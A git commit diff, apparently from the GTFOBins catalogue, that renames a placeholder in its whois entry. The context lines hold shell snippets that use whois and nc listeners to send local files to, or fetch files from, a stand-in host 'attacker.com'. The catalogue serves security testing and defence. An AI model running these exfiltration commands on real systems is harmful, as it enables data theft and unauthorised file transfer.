Replace where_to_save with file_to_save

This commit is contained in:
Emilio Pinna
2018-06-04 18:53:35 +01:00
parent 6a747b0920
commit 7e5bcab249
12 changed files with 19 additions and 19 deletions

View File

@@ -3,13 +3,13 @@ description: |
`whois` hangs waiting for the remote peer to close the socket.
functions:
upload:
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "where_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
- description: Send a text file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. The file has a trailing `$'\x0d\x0a'` and its length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
whois -h $RHOST -p $RPORT "`cat $LFILE`"
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "where_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
- description: Send a binary file to a TCP port. Run `nc -l -p 12345 | tr -d $'\x0d' | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
code: |
RHOST=attacker.com
RPORT=12345
@@ -20,12 +20,12 @@ functions:
code: |
RHOST=attacker.com
RPORT=12345
LFILE=where_to_save
LFILE=file_to_save
whois -h $RHOST -p $RPORT > "$LFILE"
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | nc -l -p 12345` on the attacker box to send the file.
code: |
RHOST=attacker.com
RPORT=12345
LFILE=where_to_save
LFILE=file_to_save
whois -h $RHOST -p $RPORT | base64 -d > "$LFILE"
---